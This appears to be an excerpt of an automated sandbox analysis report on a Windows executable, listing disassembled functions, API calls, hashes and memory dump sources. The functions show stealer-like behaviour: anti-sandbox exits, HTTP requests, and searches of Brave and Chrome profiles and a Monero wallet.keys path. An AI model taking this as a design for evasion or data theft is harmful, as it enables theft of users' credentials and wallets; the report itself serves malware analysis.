                                • Instruction Fuzzy Hash: 7E310171A00228ABDB18F7F0FC5ABEE77B8AF44340F146628F252B6181DF745945C7A2
                                Function 00E11220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 e11220-e11247 call e289b0 GlobalMemoryStatusEx 1439 e11273-e1127a 1436->1439 1440 e11249-e11271 call e2da00 * 2 1436->1440 1441 e11281-e11285 1439->1441 1440->1441 1443 e11287 1441->1443 1444 e1129a-e1129d 1441->1444 1446 e11292-e11294 ExitProcess 1443->1446 1447 e11289-e11290 1443->1447 1447->1444 1447->1446
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00E1123E
                                • __aulldiv.LIBCMT ref: 00E11258
                                • __aulldiv.LIBCMT ref: 00E11266
                                • ExitProcess.KERNEL32 ref: 00E11294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: f474c20ab1e3ab6db676f7a4766a4fdfe2081a90873f6532d25a89cb5620f5d1
                                • Instruction ID: b1f3da636a37fc18fa98aa22d069ba6464e183824918d03d42f121bd967140a5
                                • Opcode Fuzzy Hash: f474c20ab1e3ab6db676f7a4766a4fdfe2081a90873f6532d25a89cb5620f5d1
                                • Instruction Fuzzy Hash: 41014BB094431CEAEF10DBE0DC4ABDEBBB8AB14705F209588E706B6280D6B455819799
                                Function 00E26AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 e26af3 1451 e26b0a 1450->1451 1453 e26aba-e26ad7 call e2aad0 OpenEventA 1451->1453 1454 e26b0c-e26b22 call e26920 call e25b10 CloseHandle ExitProcess 1451->1454 1460 e26af5-e26b04 CloseHandle Sleep 1453->1460 1461 e26ad9-e26af1 call e2aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E26AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00E26AF9
                                • Sleep.KERNEL32(00001770), ref: 00E26B04
                                • CloseHandle.KERNEL32(?,00000000,?,008F89E0,?,00E3110C,?,00000000,?,00E31110,?,00000000,00E30AEF), ref: 00E26B1A
                                • ExitProcess.KERNEL32 ref: 00E26B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 2a91163542758e6033852dc52ec4360880716c8c16ff381b139dfc9e0da6ca65
                                • Instruction ID: ab95b0cd05c6ae31aaca21c3ceb229852b258fb951ffd5fb6dfb07cd5e12c307
                                • Opcode Fuzzy Hash: 2a91163542758e6033852dc52ec4360880716c8c16ff381b139dfc9e0da6ca65
                                • Instruction Fuzzy Hash: 0EF03A70A40329EFEB20ABA0AC06BBE7B74FF14701F106714B503B2185CBB55540D665
                                Function 00E147B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: dd9ec09cd55093258c8c595979e4d1bcab66a4d8091021d6d5f34836d48999a1
                                • Instruction ID: 7d293f49cd5563b447c68ec19af2eb855460d2baf7aae621fd05b5d21e4780e6
                                • Opcode Fuzzy Hash: dd9ec09cd55093258c8c595979e4d1bcab66a4d8091021d6d5f34836d48999a1
                                • Instruction Fuzzy Hash: 06213EB1D00209ABDF14DFA4E949ADE7B74FF44320F108629F955B7280EB706A05CB91
                                Function 00E251F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E16280: InternetOpenA.WININET(00E30DFE,00000001,00000000,00000000,00000000), ref: 00E162E1
                                  • Part of subcall function 00E16280: StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16303
                                  • Part of subcall function 00E16280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16335
                                  • Part of subcall function 00E16280: HttpOpenRequestA.WININET(00000000,GET,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E16385
                                  • Part of subcall function 00E16280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E163BF
                                  • Part of subcall function 00E16280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E163D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E25228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: ccf179b55438e1abe975f9a79b10ad5b9e0d0f5da560bc184a76ce6063cc48f9
                                • Instruction ID: 2f4b570d11141cb3b06f683f45b200a4c6cb35d827e70b36522e5cfb54fca170
                                • Opcode Fuzzy Hash: ccf179b55438e1abe975f9a79b10ad5b9e0d0f5da560bc184a76ce6063cc48f9
                                • Instruction Fuzzy Hash: 9D115271900118ABCB18FF70ED56AED77B8AF50300F445168F90A7B192EF74AB05CB91
                                Function 00E11110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E1112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E11132
                                • ExitProcess.KERNEL32 ref: 00E11143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 0d5bfa169150748f779b0db5ded73382effa1e5a46a9d92c667138c07ba68596
                                • Instruction ID: 873e4ff55918f082ae5aae43023d43f9e2edd0cfa019c4baa9bacc7c17c00db5
                                • Opcode Fuzzy Hash: 0d5bfa169150748f779b0db5ded73382effa1e5a46a9d92c667138c07ba68596
                                • Instruction Fuzzy Hash: BFE0E670B4530CFFE720ABA09C0AB597AB8AB04B15F105195F709775C4D6B926409799
                                Function 00E110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E110B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00E110F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 77a5bbf6874e929f842d20829489338ab2a7804e1a68b34a0666aca2078460f6
                                • Instruction ID: 141db8648e8a5b6d8481a79946716c5256b91321c362f2b27fbeccb894b14c3d
                                • Opcode Fuzzy Hash: 77a5bbf6874e929f842d20829489338ab2a7804e1a68b34a0666aca2078460f6
                                • Instruction Fuzzy Hash: 2FF0E271A41318BBE7149AA4AC49FFFB7E8E709B15F301588F644E3280D5729E40CBA0
                                Function 00E11190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27910
                                  • Part of subcall function 00E278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00E27917
                                  • Part of subcall function 00E278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00E2792F
                                  • Part of subcall function 00E27850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E111B7), ref: 00E27880
                                  • Part of subcall function 00E27850: RtlAllocateHeap.NTDLL(00000000), ref: 00E27887
                                  • Part of subcall function 00E27850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E2789F
                                • ExitProcess.KERNEL32 ref: 00E111C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 42f54d6f1ff71752840401f46cc3b41cc653137bdc1db36c03871a163ab694dd
                                • Instruction ID: 81d9630e1aae23aa4dc580a278ff5b73e2c30a7aff7e3ede8204dd720138c727
                                • Opcode Fuzzy Hash: 42f54d6f1ff71752840401f46cc3b41cc653137bdc1db36c03871a163ab694dd
                                • Instruction Fuzzy Hash: 7FE012B5F15325A7CB1473B0BD0BB2B76DC5B14349F042524FA45F3102FE2AE8408665

                                Non-executed Functions

                                Function 00E238B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E238CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E238E3
                                • lstrcat.KERNEL32(?,?), ref: 00E23935
                                • StrCmpCA.SHLWAPI(?,00E30F70), ref: 00E23947
                                • StrCmpCA.SHLWAPI(?,00E30F74), ref: 00E2395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E23C67
                                • FindClose.KERNEL32(000000FF), ref: 00E23C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: f9fb3305bb24e53c2c63ae64be95f9861bbf65fa520be5bf9b7c57342aa2ff85
                                • Instruction ID: fad0990cd6d050bd3c8f7cb758387aa08c68549140ef813b593c2ecdb9a9b5cc
                                • Opcode Fuzzy Hash: f9fb3305bb24e53c2c63ae64be95f9861bbf65fa520be5bf9b7c57342aa2ff85
                                • Instruction Fuzzy Hash: 37A122B1A003189BDB34DF64DC89FFA77B9BB88300F044598A64DA7145DB799B84CF61
                                Function 00E1BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00E30B32,00E30B2B,00000000,?,?,?,00E313F4,00E30B2A), ref: 00E1BEF5
                                • StrCmpCA.SHLWAPI(?,00E313F8), ref: 00E1BF4D
                                • StrCmpCA.SHLWAPI(?,00E313FC), ref: 00E1BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00E1C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: fa1eead52c740f69c23433a8022016111859af6e83c17f494a1001a3d2276f9c
                                • Instruction ID: b467aa9e8730c3981711ea10e869e2a36eac309b5e6e7a5419696b258e04f643
                                • Opcode Fuzzy Hash: fa1eead52c740f69c23433a8022016111859af6e83c17f494a1001a3d2276f9c
                                • Instruction Fuzzy Hash: 5C4244729101189BCB18FB70ED96EEE73BDAF88300F445569F506B7181EE349B49CB92
                                Function 00E24910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E2492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E24943
                                • StrCmpCA.SHLWAPI(?,00E30FDC), ref: 00E24971
                                • StrCmpCA.SHLWAPI(?,00E30FE0), ref: 00E24987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E24B7D
                                • FindClose.KERNEL32(000000FF), ref: 00E24B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
